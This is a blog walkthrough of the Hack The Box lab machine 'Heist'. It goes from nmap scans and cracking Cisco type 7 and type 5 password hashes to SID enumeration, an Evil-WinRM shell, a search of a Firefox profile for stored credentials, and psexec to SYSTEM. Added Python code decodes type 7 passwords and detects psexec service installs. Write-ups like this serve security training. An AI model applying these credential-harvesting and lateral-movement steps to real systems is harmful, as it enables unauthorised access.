Hack The Box Heist Walkthrough – 10.10.10.149

Heist is an easy Windows box in the Hack The Box CTF series.

As usual, I added 10.10.10.149 to /etc/hosts as heist.htb.

INITIAL ENUMERATION

I started with an nmap port scan using the command nmap -v -sV -sC -oN nmap.scan heist.htb.

The NMAP result was as below:

➜  heist nmap -v -sV -sC -oN nmap.scan 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 13:15 +03
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:15
Completed NSE at 13:15, 0.00s elapsed
Initiating NSE at 13:15
Completed NSE at 13:15, 0.00s elapsed
Initiating NSE at 13:15
Completed NSE at 13:15, 0.00s elapsed
Initiating Ping Scan at 13:15
Scanning 10.10.10.149 [4 ports]
Completed Ping Scan at 13:15, 0.39s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:15
Completed Parallel DNS resolution of 1 host. at 13:15, 0.05s elapsed
Initiating SYN Stealth Scan at 13:15
Scanning 10.10.10.149 [1000 ports]
Discovered open port 135/tcp on 10.10.10.149
Discovered open port 445/tcp on 10.10.10.149
Discovered open port 80/tcp on 10.10.10.149
Completed SYN Stealth Scan at 13:15, 24.33s elapsed (1000 total ports)
Initiating Service scan at 13:15
Scanning 3 services on 10.10.10.149
Completed Service scan at 13:16, 20.01s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.10.149.
Initiating NSE at 13:16
Completed NSE at 13:16, 40.08s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 1.06s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Nmap scan report for 10.10.10.149
Host is up (0.27s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-11-10T10:16:11
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.62 seconds
           Raw packets sent: 2014 (88.592KB) | Rcvd: 17 (732B)
➜  heist 

Nmap revealed a couple of open ports; SMB (445) and IIS (80) are the interesting ones here. Since the machine runs SMB v2, I'm not looking at it for now and moved on to enumerate the web server.

The default web page hosted on IIS is a support login page for reporting issues. There is an option to log in as guest, which lists an open issue about a Cisco router, with an attachment.

The attachment is just a txt file containing the running configuration of a Cisco IOS device, including the encrypted passwords of admin and of a user called rout3r.

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

Cisco type 7 passwords are trivial to decrypt these days; I used an online Cisco type 7 decryptor on the encrypted passwords from the txt file in the attachment. The type 5 hash is a different matter: it can't simply be reversed, so I had to crack it with hashcat. Hashcat cracked it in a few minutes, and the password is stealth1agent.
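As an added example (not from the original post), here is why type 7 strings fall so easily: IOS XORs each byte against a fixed, public key, so anyone holding the config can reverse it, whereas the type 5 enable secret is a salted MD5-crypt hash that can only be cracked offline. The decoder is run over the two credential lines from the attachment above; the XLAT constant is the public IOS table, and the helper names are mine.

```python
import re

# Public constant key IOS uses for type 7 obfuscation (the same on every device).
XLAT = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

def decode_type7(enc: str) -> str:
    """Decode a type 7 string: a 2-digit decimal seed, then hex bytes XORed with XLAT."""
    if not re.fullmatch(r"\d{2}(?:[0-9A-Fa-f]{2})+", enc):
        raise ValueError(f"not a type 7 string: {enc!r}")
    seed = int(enc[:2])
    if seed > 15:  # IOS only emits seeds 0..15
        raise ValueError(f"bad seed {seed}")
    body = bytes.fromhex(enc[2:])
    return "".join(chr(b ^ ord(XLAT[(seed + i) % len(XLAT)])) for i, b in enumerate(body))

def encode_type7(plain: str, seed: int = 2) -> str:
    """Inverse of decode_type7: no secret is involved, which is the whole problem."""
    return f"{seed:02d}" + "".join(
        f"{b ^ ord(XLAT[(seed + i) % len(XLAT)]):02X}" for i, b in enumerate(plain.encode()))

# Matches 'username X ... password 7 HEX' and 'enable password 7 HEX'.
TYPE7_RE = re.compile(r"^(?:username (\S+).*?|enable) password 7 ([0-9A-Fa-f]+)\s*$", re.M)
# Matches 'enable secret 5 $1$salt$hash' (MD5-crypt: salted hash, only crackable offline).
TYPE5_RE = re.compile(r"^enable secret 5 (\$1\$[^$\s]+\$\S+)\s*$", re.M)

def triage_config(config: str) -> dict:
    """Return {name: (kind, value)}: type 7 entries come back as plaintext,
    type 5 entries as the hash itself, since it cannot be reversed."""
    found = {}
    for user, enc in TYPE7_RE.findall(config):
        found[user or "enable"] = ("type7-plaintext", decode_type7(enc))
    for h in TYPE5_RE.findall(config):
        found["enable-secret"] = ("type5-hash", h)
    return found

# Excerpt of the config attachment shown above (the credential lines only).
SAMPLE_CONFIG = """\
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for name, (kind, value) in triage_config(SAMPLE_CONFIG).items():
        print(f"{name:14} {kind:16} {value}")
```

The practical takeaway is that service password-encryption only protects against shoulder-surfing; credentials in a config that leaves the device should be treated as plaintext.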

Now that I have all the passwords, let me see where I can use them. For usernames I tried "rout3r" and "admin", but those didn't work; then I realised there was a user called "hazard" on the "issues" page, so I tried "hazard" against the SMB login. The login succeeded, but the only shares listed were the default administrative ones, which hazard has no privilege to access.

➜  heist smbclient -U hazard%stealth1agent -L 10.10.10.149

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.149 failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available

I need to find more users on the box, and for that I used Impacket. Impacket has a script called lookupsid.py (https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py) that lists the users of a Windows machine as long as you have credentials for one authenticated user.

The script listed a number of support users:

➜  heist python lookupsid.py hazard:stealth1agent@heist.htb
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at heist.htb
[*] StringBinding ncacn_np:heist.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
➜  heist 

Since I wasn't able to do any further enumeration, I decided to use Evil-WinRM (a shell over Windows Remote Management) to see if I could get a user shell. For this I need port 5985, the default WinRM HTTP port, to be open.

➜  evil-winrm git:(master) nmap -p 5985 heist.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 14:41 +03
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.15s latency).

PORT     STATE SERVICE
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
➜  evil-winrm git:(master) 

OK, the port is open. Now let's try the users I enumerated with the password I found after decrypting the Cisco IOS configuration.

After trying a couple of users, the user Chase gave me a user shell on the box Heist.

➜  evil-winrm git:(master) ruby evil-winrm.rb -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d' -i heist.htb

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> 

Getting User.txt

Here is how I got user.txt:

➜  evil-winrm git:(master) ruby evil-winrm.rb -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d' -i heist.htb

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
*Evil-WinRM* PS C:\Users\Chase> cd Desktop
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir


    Directory: C:\Users\Chase\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt


*Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt
a127dae[---------]95f59c4
*Evil-WinRM* PS C:\Users\Chase\Desktop> 

PRIVILEGE ESCALATION

There are a couple of ways to privesc on this box; I'm going with the intended one, which is recovering the password stored in the Firefox user profile.

So first I changed directory to C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\sessionstore-backups

and searched the profile with this PowerShell command:

Get-ChildItem -Path $Env:USERPROFILE -Recurse -File | Select-String password

After a few initial failures, I had the password for admin:

Next, I used that password with Impacket's psexec.py script and got root.txt:

➜  heist python psexec.py administrator@heist.htb
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Requesting shares on heist.htb.....
[*] Found writable share ADMIN$
[*] Uploading file nLvdvvMS.exe
[*] Opening SVCManager on heist.htb.....
[*] Creating service ZqjZ on heist.htb.....
[*] Starting service ZqjZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd / 

C:\>cd Users/Administrator/Desktop

C:\Users\Administrator\Desktop>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 78E3-E62D

 Directory of C:\Users\Administrator\Desktop

04/22/2019  09:05 AM    <DIR>          .
04/22/2019  09:05 AM    <DIR>          ..
04/22/2019  09:05 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,839,940,608 bytes free

C:\Users\Administrator\Desktop>type root.txt
50dfa3[-----------------]3d766897
C:\Users\Administrator\Desktop>
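From the defender's side, the psexec.py session above leaves a distinctive trace: a random-named executable written into ADMIN$ (the Windows directory) and a random-named service installed and started, which the System log records as event 7045. The following is an added example, not part of the original post, that scores 7045 records for that pattern; the field names mirror a Get-WinEvent export and the sample records are constructed, the first one using the service and file names from the session above.

```python
import re
from dataclasses import dataclass, field

# What psexec.py did above: upload a random 8-letter .exe to ADMIN$ (C:\Windows),
# register it as a random 4-letter demand-start service, then start it.
WINROOT_RE = re.compile(r'^"?(?:%SystemRoot%|C:\\Windows)\\([^\\"]+\.exe)"?(?:\s.*)?$', re.I)
RANDOM_SVC_RE = re.compile(r"^[A-Za-z]{4}$")
RANDOM_EXE_RE = re.compile(r"^[A-Za-z]{8}\.exe$", re.I)

@dataclass
class Finding:
    record_id: int
    service: str
    image: str
    score: int = 0
    reasons: list = field(default_factory=list)

def score_service_install(ev):
    """Score one System log 7045 (service installed) record; None when not suspicious."""
    if ev.get("EventID") != 7045:
        return None
    f = Finding(ev["RecordId"], ev["ServiceName"], ev["ImagePath"])
    def hit(points, why):
        f.score += points
        f.reasons.append(why)
    m = WINROOT_RE.match(f.image)
    if m:
        hit(2, "service binary sits directly in the Windows root (ADMIN$)")
        if RANDOM_EXE_RE.match(m.group(1)):
            hit(1, "8-letter random-looking executable name")
    if RANDOM_SVC_RE.match(f.service):
        hit(1, "4-letter random-looking service name")
    if ev.get("StartType", "").lower() == "demand start":
        hit(1, "demand-start service, typical of a one-shot remote exec")
    return f if f.score >= 3 else None

def triage(events):
    """Return the suspicious findings from a list of event records."""
    return [f for f in map(score_service_install, events) if f]

# Constructed sample records in the shape of a Get-WinEvent export; the first
# mirrors the service and file names seen in the psexec session above.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 7045, "ServiceName": "ZqjZ",
     "ImagePath": r"%SystemRoot%\nLvdvvMS.exe", "StartType": "demand start"},
    {"RecordId": 2, "EventID": 7045, "ServiceName": "Sense", "StartType": "demand start",
     "ImagePath": r'"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"'},
    {"RecordId": 3, "EventID": 7036, "ServiceName": "Spooler", "ImagePath": "", "StartType": ""},
]
```

Running triage(SAMPLE_EVENTS) flags only the first record; a benign Defender service and a non-7045 event score below the threshold.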

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug bounty. If you are an HTB user and like my articles, please give respect here: Profile: https://www.hackthebox.eu/nav1n
